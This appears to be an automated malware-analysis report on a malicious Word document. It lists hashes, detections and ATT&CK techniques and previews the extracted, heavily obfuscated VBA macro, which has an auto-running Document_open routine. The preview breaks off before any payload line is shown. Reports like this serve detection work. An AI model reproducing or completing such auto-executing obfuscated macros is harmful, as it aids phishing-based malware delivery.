Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c481da6c19c04e14…

MALICIOUS

Office (OLE)

156.6 KB Created: 2018-07-23 11:08:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 207f4f1756dda03f7089278d3390a28b SHA-1: bf03cd259102424b9cb406fe2ef3cdaf9d463141 SHA-256: c481da6c19c04e148954cf541b2819b70ea1108ddb9916553a0eb266f7694ab3
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file is a Microsoft Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA code, which is commonly used to execute arbitrary commands. The 'Document_Open' macro firing suggests this malicious code is designed to run automatically when the document is opened. While the VBA code is heavily obfuscated, the presence of these indicators strongly suggests the document's purpose is to download and execute a secondary payload, aligning with common malware delivery techniques.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-10026440-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10026440-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29534 bytes
SHA-256: 1bf68875b137a1cc844bf647b923b5e0afc8f0781c79ffadbe68c97eef35856d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "mVMLiwfHzQGmN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function DqGrcBsalmcUp()
On Error Resume Next
   If HlPMG Xor 11 Then
      ElseIf OfOpP Eqv dKPwb Then
      If dWETnc = lBSAVo Then
         GEzZJ = Oct(STdfwX * 41517)
      End If
   End If
   If dBprN Xor 11 Then
      ElseIf JEozm Eqv UAvftB Then
      If KZNpmr = KtZXQG Then
         RXRLd = Oct(rzzIbW * 4692)
      End If
   End If
   If Truqnu Xor 11 Then
      ElseIf ChnwNp Eqv LznMI Then
      If DHznv = hVYKml Then
         fHNTYB = Oct(AJrjzW * 52570)
      End If
   End If
   If hACWV Xor 11 Then
      ElseIf uQLDA Eqv OPfRhj Then
      If DciTP = INaEOP Then
         dqMYUt = Oct(QWHFIc * 78715)
      End If
   End If
   If SDlhBr Xor 11 Then
      ElseIf ZUYTz Eqv QiANH Then
      If pimowS = NEKYwZ Then
         rLLNl = Oct(woQlTI * 4604)
      End If
   End If
End Function
Private Function UQjFdMtH()
On Error Resume Next
   If iKYVLU <= GqVAr Then
      Set kLtVb = PJTpTl
      cBNIv = (lWHuQ * aOIqz - zzfYku + qqkXL + 41045 - jmsFs)
   End If
   If tFsdQd <= BiGTT Then
      Set VltERT = ERAzvZ
      UnWCw = (WEunu * QwpIi - rcjzs + oYoVbF + 86446 - rSwNLD)
   End If
   If FIijw Xor 11 Then
      ElseIf RVQivN Eqv fGJHRd Then
      If kzCrO = lDlFoa Then
         jQwqSw = Oct(tIwojS * 76101)
      End If
   End If
   If MUdWBK Xor 11 Then
      ElseIf JMziPK Eqv XtPQp Then
      If XiZQp = EZBuU Then
         iMWff = Oct(fmnSq * 97927)
      End If
   End If
   If WRrGJ <= DzPIVu Then
      Set zbWvh = ZbAco
      NczAbw = (joFSFl * rVrFSj - ctrZSi + uaWoDM + 91927 - FwnMv)
   End If
End Function
Private Function YSTjndVYH()
On Error Resume Next
   If ADPCwX Xor 11 Then
      ElseIf iznrGt Eqv QRDNo Then
      If QJXBYV = uIRXLz Then
         zhnLsi = Oct(ofPNp * 88771)
      End If
   End If
   If flIGO Xor 11 Then
      ElseIf VKjKBj Eqv GWWoiL Then
      If utzfm = tYsjY Then
         ioqwB = Oct(OModO * 97741)
      End If
   End If
   If ttFjWc Xor 11 Then
      ElseIf jNidpz Eqv jPjHT Then
      If iirVF = cdHnia Then
         wPXRb = Oct(wFAahO * 86621)
      End If
   End If
   If wrcAmL Xor 11 Then
      ElseIf NEqBc Eqv GCfLs Then
      If RamjQS = CDQKnQ Then
         sWVGC = Oct(uIDJn * 12894)
      End If
   End If
   If tjFocE Xor 11 Then
      ElseIf LLHLir Eqv AwuDk Then
      If MjhZI = iJXdw Then
         nwJUK = Oct(KMcjK * 25732)
      End If
   End If
   If zzhib Xor 11 Then
      ElseIf NPCki Eqv zOYZvC Then
      If BKIwEi = MiDJG Then
         QNiIG = Oct(zlkAV * 64745)
      End If
   End If
   If CLdaX Xor 11 Then
      ElseIf NBUSF Eqv CnmZGV Then
      If dHTOq = QSwlCO Then
         GIWdCF = Oct(nwMLwT * 46038)
      End If
   End If
End Function
Private Function wrzHrQbvhRSf()
On Error Resume Next
   If sIzRMo Xor 11 Then
      ElseIf LVLEh Eqv wIrdQJ Then
      If IBTYu = FrPnK Then
         OVqLd = Oct(ZKnNj * 88657)
      End If
   End If
   If nCNhD Xor 11 Then
      ElseIf ZalrpZ Eqv Ljjwh Then
      If DSIHw = Hrzcu Then
         ZhVNC = Oct(ikUbnk * 98644)
      End If
   End If
   If OPoWC Xor 11 Then
      ElseIf scGLwP Eqv FDCMMb Then
      If mpHnU = dPBjzl Then
         YnwHK = Oct(pjfTz * 18218)
      End If
   End If
   If zNaHR Xor 11 Then
      ElseIf toGiuQ Eqv vwZwr Then
      If PsAzj = Nwjbi Then
         IaKId = Oct(UcVjt * 29164)
      End If
   End If
   If zpbolu Xor 11 Then
      ElseIf cSQBIa Eqv DYTBSF Then
      If oUQkE = jUanl Then
         KZBFvG = Oct(AVYjF * 67510)
      End If
   End If
End Function
Private Sub Document_open()
On Error Resume Next
   If ltMnWY Xor iCwVIY Then
      For BkhpY = 22 To Jqsfr
         kzNCb = 74081 * jwNaQ + dFUmZ + sImaK - jqihuB - vAocVz + jAobo - QluCp / 7684 / WzNwX / 6199 - rva
... (truncated)